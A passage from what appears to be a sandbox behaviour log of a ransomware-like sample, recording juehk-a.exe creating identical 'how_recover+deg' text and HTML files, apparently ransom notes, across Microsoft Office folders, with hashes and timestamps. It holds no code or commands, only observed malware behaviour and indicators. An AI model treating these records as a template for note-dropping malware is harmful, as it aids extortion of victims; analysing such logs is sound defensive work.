18078.          fid (ads:): 562949953521221
18079.          ntstatus: 0x0
18080.          CreateOptions: 0x60
18081.        file:
18082.          timestamp: 77804
18083.          mode: close
18084.          sequenceNumber: 1279
18085.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.html
18086.          filesize: 9480
18087.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18088.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18089.          processinfo:
18090.            pid: 1648
18091.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18092.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18093.            ads:
18094.          fid (ads:): 562949953521221
18095.          ntstatus: 0x0
18096.          CreateOptions: 0x0
18097.        file:
18098.          timestamp: 77813
18099.          mode: created
18100.          sequenceNumber: 1280
18101.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.txt
18102.          processinfo:
18103.            pid: 1648
18104.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18105.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18106.            ads:
18107.          fid (ads:): 562949953521222
18108.          ntstatus: 0x0
18109.          CreateOptions: 0x60
18110.        file:
18111.          timestamp: 77824
18112.          mode: close
18113.          sequenceNumber: 1281
18114.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.txt
18115.          filesize: 2673
18116.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18117.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18118.          processinfo:
18119.            pid: 1648
18120.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18121.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18122.            ads:
18123.          fid (ads:): 562949953521222
18124.          ntstatus: 0x0
18125.          CreateOptions: 0x0
18126.        file:
18127.          timestamp: 77829
18128.          mode: created
18129.          sequenceNumber: 1282
18130.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.html
18131.          processinfo:
18132.            pid: 1648
18133.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18134.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18135.            ads:
18136.          fid (ads:): 844424930231879
18137.          ntstatus: 0x0
18138.          CreateOptions: 0x60
18139.        file:
18140.          timestamp: 77834
18141.          mode: close
18142.          sequenceNumber: 1283
18143.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\InfoPath.en-us\how_recover+deg.html
18144.          filesize: 9480
18145.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18146.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18147.          processinfo:
18148.            pid: 1648
18149.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18150.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18151.            ads:
18152.          fid (ads:): 844424930231879
18153.          ntstatus: 0x0
18154.          CreateOptions: 0x0
18155.        file:
18156.          timestamp: 77844
18157.          mode: created
18158.          sequenceNumber: 1284
18159.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.txt
18160.          processinfo:
18161.            pid: 1648
18162.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18163.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18164.            ads:
18165.          fid (ads:): 844424930231880
18166.          ntstatus: 0x0
18167.          CreateOptions: 0x60
18168.        file:
18169.          timestamp: 77852
18170.          mode: close
18171.          sequenceNumber: 1285
18172.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.txt
18173.          filesize: 2673
18174.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18175.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18176.          processinfo:
18177.            pid: 1648
18178.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18179.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18180.            ads:
18181.          fid (ads:): 844424930231880
18182.          ntstatus: 0x0
18183.          CreateOptions: 0x0
18184.        file:
18185.          timestamp: 77935
18186.          mode: created
18187.          sequenceNumber: 1286
18188.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.html
18189.          processinfo:
18190.            pid: 1648
18191.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18192.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18193.            ads:
18194.          fid (ads:): 1688849860346363
18195.          ntstatus: 0x0
18196.          CreateOptions: 0x60
18197.        file:
18198.          timestamp: 77943
18199.          mode: close
18200.          sequenceNumber: 1287
18201.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Lync.en-us\how_recover+deg.html
18202.          filesize: 9480
18203.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18204.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18205.          processinfo:
18206.            pid: 1648
18207.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18208.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18209.            ads:
18210.          fid (ads:): 1688849860346363
18211.          ntstatus: 0x0
18212.          CreateOptions: 0x0
18213.        file:
18214.          timestamp: 77975
18215.          mode: created
18216.          sequenceNumber: 1288
18217.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.txt
18218.          processinfo:
18219.            pid: 1648
18220.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18221.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18222.            ads:
18223.          fid (ads:): 1407374883653193
18224.          ntstatus: 0x0
18225.          CreateOptions: 0x60
18226.        file:
18227.          timestamp: 77980
18228.          mode: close
18229.          sequenceNumber: 1289
18230.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.txt
18231.          filesize: 2673
18232.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18233.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18234.          processinfo:
18235.            pid: 1648
18236.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18237.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18238.            ads:
18239.          fid (ads:): 1407374883653193
18240.          ntstatus: 0x0
18241.          CreateOptions: 0x0
18242.        file:
18243.          timestamp: 77990
18244.          mode: created
18245.          sequenceNumber: 1290
18246.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.html
18247.          processinfo:
18248.            pid: 1648
18249.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18251.            ads:
18252.          fid (ads:): 844424930231882
18253.          ntstatus: 0x0
18254.          CreateOptions: 0x60
18255.        file:
18256.          timestamp: 77994
18257.          mode: close
18258.          sequenceNumber: 1291
18259.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office.en-us\how_recover+deg.html
18260.          filesize: 9480
18261.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18262.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18263.          processinfo:
18264.            pid: 1648
18265.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18266.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18267.            ads:
18268.          fid (ads:): 844424930231882
18269.          ntstatus: 0x0
18270.          CreateOptions: 0x0
18271.        file:
18272.          timestamp: 78057
18273.          mode: created
18274.          sequenceNumber: 1292
18275.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.txt
18276.          processinfo:
18277.            pid: 1648
18278.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18280.            ads:
18281.          fid (ads:): 562949953521227
18282.          ntstatus: 0x0
18283.          CreateOptions: 0x60
18284.        file:
18285.          timestamp: 78064
18286.          mode: close
18287.          sequenceNumber: 1293
18288.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.txt
18289.          filesize: 2673
18290.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18291.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18292.          processinfo:
18293.            pid: 1648
18294.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18296.            ads:
18297.          fid (ads:): 562949953521227
18298.          ntstatus: 0x0
18299.          CreateOptions: 0x0
18300.        file:
18301.          timestamp: 78112
18302.          mode: created
18303.          sequenceNumber: 1294
18304.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.html
18305.          processinfo:
18306.            pid: 1648
18307.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18308.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18309.            ads:
18310.          fid (ads:): 562949953521228
18311.          ntstatus: 0x0
18312.          CreateOptions: 0x60
18313.        file:
18314.          timestamp: 78118
18315.          mode: close
18316.          sequenceNumber: 1295
18317.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.en-us\how_recover+deg.html
18318.          filesize: 9480
18319.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18320.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18321.          processinfo:
18322.            pid: 1648
18323.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18324.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18325.            ads:
18326.          fid (ads:): 562949953521228
18327.          ntstatus: 0x0
18328.          CreateOptions: 0x0
18329.        file:
18330.          timestamp: 78128
18331.          mode: created
18332.          sequenceNumber: 1296
18333.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.txt
18334.          processinfo:
18335.            pid: 1648
18336.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18338.            ads:
18339.          fid (ads:): 562949953521229
18340.          ntstatus: 0x0
18341.          CreateOptions: 0x60
18342.        file:
18343.          timestamp: 78132
18344.          mode: close
18345.          sequenceNumber: 1297
18346.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.txt
18347.          filesize: 2673
18348.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18349.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18350.          processinfo:
18351.            pid: 1648
18352.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18353.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18354.            ads:
18355.          fid (ads:): 562949953521229
18356.          ntstatus: 0x0
18357.          CreateOptions: 0x0
18358.        file:
18359.          timestamp: 78141
18360.          mode: created
18361.          sequenceNumber: 1298
18362.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.html
18363.          processinfo:
18364.            pid: 1648
18365.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18366.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18367.            ads:
18368.          fid (ads:): 562949953521230
18369.          ntstatus: 0x0
18370.          CreateOptions: 0x60
18371.        file:
18372.          timestamp: 78148
18373.          mode: close
18374.          sequenceNumber: 1299
18375.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Office32.WW\how_recover+deg.html
18376.          filesize: 9480
18377.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18378.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18379.          processinfo:
18380.            pid: 1648
18381.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18382.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18383.            ads:
18384.          fid (ads:): 562949953521230
18385.          ntstatus: 0x0
18386.          CreateOptions: 0x0
18387.        file:
18388.          timestamp: 78190
18389.          mode: created
18390.          sequenceNumber: 1300
18391.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.txt
18392.          processinfo:
18393.            pid: 1648
18394.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18396.            ads:
18397.          fid (ads:): 562949953521231
18398.          ntstatus: 0x0
18399.          CreateOptions: 0x60
18400.        file:
18401.          timestamp: 78197
18402.          mode: close
18403.          sequenceNumber: 1301
18404.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.txt
18405.          filesize: 2673
18406.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18407.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18408.          processinfo:
18409.            pid: 1648
18410.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18412.            ads:
18413.          fid (ads:): 562949953521231
18414.          ntstatus: 0x0
18415.          CreateOptions: 0x0
18416.        file:
18417.          timestamp: 78214
18418.          mode: created
18419.          sequenceNumber: 1302
18420.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.html
18421.          processinfo:
18422.            pid: 1648
18423.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18424.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18425.            ads:
18426.          fid (ads:): 562949953521232
18427.          ntstatus: 0x0
18428.          CreateOptions: 0x60
18429.        file:
18430.          timestamp: 78219
18431.          mode: close
18432.          sequenceNumber: 1303
18433.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OneNote.en-us\how_recover+deg.html
18434.          filesize: 9480
18435.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18436.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18437.          processinfo:
18438.            pid: 1648
18439.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18441.            ads:
18442.          fid (ads:): 562949953521232
18443.          ntstatus: 0x0
18444.          CreateOptions: 0x0
18445.        file:
18446.          timestamp: 78224
18447.          mode: created
18448.          sequenceNumber: 1304
18449.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.txt
18450.          processinfo:
18451.            pid: 1648
18452.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18453.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18454.            ads:
18455.          fid (ads:): 562949953521233
18456.          ntstatus: 0x0
18457.          CreateOptions: 0x60
18458.        file:
18459.          timestamp: 78228
18460.          mode: close
18461.          sequenceNumber: 1305
18462.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.txt
18463.          filesize: 2673
18464.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18465.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18466.          processinfo:
18467.            pid: 1648
18468.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18469.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18470.            ads:
18471.          fid (ads:): 562949953521233
18472.          ntstatus: 0x0
18473.          CreateOptions: 0x0
18474.        file:
18475.          timestamp: 78237
18476.          mode: created
18477.          sequenceNumber: 1306
18478.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.html
18479.          processinfo:
18480.            pid: 1648
18481.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18482.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18483.            ads:
18484.          fid (ads:): 562949953521234
18485.          ntstatus: 0x0
18486.          CreateOptions: 0x60
18487.        file:
18488.          timestamp: 78245
18489.          mode: close
18490.          sequenceNumber: 1307
18491.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSM.en-us\how_recover+deg.html
18492.          filesize: 9480
18493.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18494.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18495.          processinfo:
18496.            pid: 1648
18497.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18498.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18499.            ads:
18500.          fid (ads:): 562949953521234
18501.          ntstatus: 0x0
18502.          CreateOptions: 0x0
18503.        file:
18504.          timestamp: 78253
18505.          mode: created
18506.          sequenceNumber: 1308
18507.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.txt
18508.          processinfo:
18509.            pid: 1648
18510.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18511.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18512.            ads:
18513.          fid (ads:): 562949953521235
18514.          ntstatus: 0x0
18515.          CreateOptions: 0x60
18516.        file:
18517.          timestamp: 78262
18518.          mode: close
18519.          sequenceNumber: 1309
18520.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.txt
18521.          filesize: 2673
18522.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18523.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18524.          processinfo:
18525.            pid: 1648
18526.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18527.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18528.            ads:
18529.          fid (ads:): 562949953521235
18530.          ntstatus: 0x0
18531.          CreateOptions: 0x0
18532.        apicall:
18533.          timestamp: 78296
18534.          repeat: 3000
18535.          sequenceNumber: 1310
18536.          processinfo:
18537.            pid: 1648
18538.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18539.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18540.          dllname: kernel32.dll
18541.          apiname: Sleep
18542.          address: 0x0041ed5b
18543.        file:
18544.          timestamp: 78309
18545.          mode: created
18546.          sequenceNumber: 1311
18547.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.html
18548.          processinfo:
18549.            pid: 1648
18550.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18551.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18552.            ads:
18553.          fid (ads:): 562949953521236
18554.          ntstatus: 0x0
18555.          CreateOptions: 0x60
18556.        file:
18557.          timestamp: 78317
18558.          mode: close
18559.          sequenceNumber: 1312
18560.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.html
18561.          filesize: 9480
18562.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18563.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18564.          processinfo:
18565.            pid: 1648
18566.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18567.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18568.            ads:
18569.          fid (ads:): 562949953521236
18570.          ntstatus: 0x0
18571.          CreateOptions: 0x0
18572.        file:
18573.          timestamp: 78369
18574.          mode: created
18575.          sequenceNumber: 1313
18576.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.txt
18577.          processinfo:
18578.            pid: 1648
18579.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18580.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18581.            ads:
18582.          fid (ads:): 562949953521237
18583.          ntstatus: 0x0
18584.          CreateOptions: 0x60
18585.        file:
18586.          timestamp: 78376
18587.          mode: close
18588.          sequenceNumber: 1314
18589.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.txt
18590.          filesize: 2673
18591.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18592.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18593.          processinfo:
18594.            pid: 1648
18595.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18596.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18597.            ads:
18598.          fid (ads:): 562949953521237
18599.          ntstatus: 0x0
18600.          CreateOptions: 0x0
18601.        file:
18602.          timestamp: 78384
18603.          mode: created
18604.          sequenceNumber: 1315
18605.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.html
18606.          processinfo:
18607.            pid: 1648
18608.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18610.            ads:
18611.          fid (ads:): 562949953521238
18612.          ntstatus: 0x0
18613.          CreateOptions: 0x60
18614.        file:
18615.          timestamp: 78391
18616.          mode: close
18617.          sequenceNumber: 1316
18618.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.html
18619.          filesize: 9480
18620.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18621.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18622.          processinfo:
18623.            pid: 1648
18624.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18625.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18626.            ads:
18627.          fid (ads:): 562949953521238
18628.          ntstatus: 0x0
18629.          CreateOptions: 0x0
18630.        file:
18631.          timestamp: 78427
18632.          mode: created
18633.          sequenceNumber: 1317
18634.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.txt
18635.          processinfo:
18636.            pid: 1648
18637.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18638.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18639.            ads:
18640.          fid (ads:): 562949953521239
18641.          ntstatus: 0x0
18642.          CreateOptions: 0x60
18643.        file:
18644.          timestamp: 78435
18645.          mode: close
18646.          sequenceNumber: 1318
18647.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.txt
18648.          filesize: 2673
18649.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18650.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18651.          processinfo:
18652.            pid: 1648
18653.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18654.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18655.            ads:
18656.          fid (ads:): 562949953521239
18657.          ntstatus: 0x0
18658.          CreateOptions: 0x0
18659.        file:
18660.          timestamp: 78532
18661.          mode: created
18662.          sequenceNumber: 1319
18663.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.html
18664.          processinfo:
18665.            pid: 1648
18666.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18667.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18668.            ads:
18669.          fid (ads:): 562949953521240
18670.          ntstatus: 0x0
18671.          CreateOptions: 0x60
18672.        file:
18673.          timestamp: 78539
18674.          mode: close
18675.          sequenceNumber: 1320
18676.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.html
18677.          filesize: 9480
18678.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18679.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18680.          processinfo:
18681.            pid: 1648
18682.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18683.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18684.            ads:
18685.          fid (ads:): 562949953521240
18686.          ntstatus: 0x0
18687.          CreateOptions: 0x0
18688.        file:
18689.          timestamp: 78549
18690.          mode: created
18691.          sequenceNumber: 1321
18692.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.txt
18693.          processinfo:
18694.            pid: 1648
18695.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18696.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18697.            ads:
18698.          fid (ads:): 562949953521241
18699.          ntstatus: 0x0
18700.          CreateOptions: 0x60
18701.        file:
18702.          timestamp: 78557
18703.          mode: close
18704.          sequenceNumber: 1322
18705.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.txt
18706.          filesize: 2673
18707.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18708.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18709.          processinfo:
18710.            pid: 1648
18711.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18712.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18713.            ads:
18714.          fid (ads:): 562949953521241
18715.          ntstatus: 0x0
18716.          CreateOptions: 0x0
18717.        file:
18718.          timestamp: 78564
18719.          mode: created
18720.          sequenceNumber: 1323
18721.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.html
18722.          processinfo:
18723.            pid: 1648
18724.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18725.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18726.            ads:
18727.          fid (ads:): 562949953521242
18728.          ntstatus: 0x0
18729.          CreateOptions: 0x60
18730.        file:
18731.          timestamp: 78571
18732.          mode: close
18733.          sequenceNumber: 1324
18734.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.html
18735.          filesize: 9480
18736.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18737.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18738.          processinfo:
18739.            pid: 1648
18740.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18741.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18742.            ads:
18743.          fid (ads:): 562949953521242
18744.          ntstatus: 0x0
18745.          CreateOptions: 0x0
18746.        file:
18747.          timestamp: 78579
18748.          mode: created
18749.          sequenceNumber: 1325
18750.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.txt
18751.          processinfo:
18752.            pid: 1648
18753.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18754.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18755.            ads:
18756.          fid (ads:): 562949953521243
18757.          ntstatus: 0x0
18758.          CreateOptions: 0x60
18759.        file:
18760.          timestamp: 78586
18761.          mode: close
18762.          sequenceNumber: 1326
18763.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.txt
18764.          filesize: 2673
18765.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18766.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18767.          processinfo:
18768.            pid: 1648
18769.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18771.            ads:
18772.          fid (ads:): 562949953521243
18773.          ntstatus: 0x0
18774.          CreateOptions: 0x0
18775.        file:
18776.          timestamp: 78710
18777.          mode: created
18778.          sequenceNumber: 1327
18779.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.html
18780.          processinfo:
18781.            pid: 1648
18782.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18783.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18784.            ads:
18785.          fid (ads:): 562949953521244
18786.          ntstatus: 0x0
18787.          CreateOptions: 0x60
18788.        file:
18789.          timestamp: 78716
18790.          mode: close
18791.          sequenceNumber: 1328
18792.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.html
18793.          filesize: 9480
18794.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18795.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18796.          processinfo:
18797.            pid: 1648
18798.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18799.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18800.            ads:
18801.          fid (ads:): 562949953521244
18802.          ntstatus: 0x0
18803.          CreateOptions: 0x0
18804.        file:
18805.          timestamp: 78724
18806.          mode: created
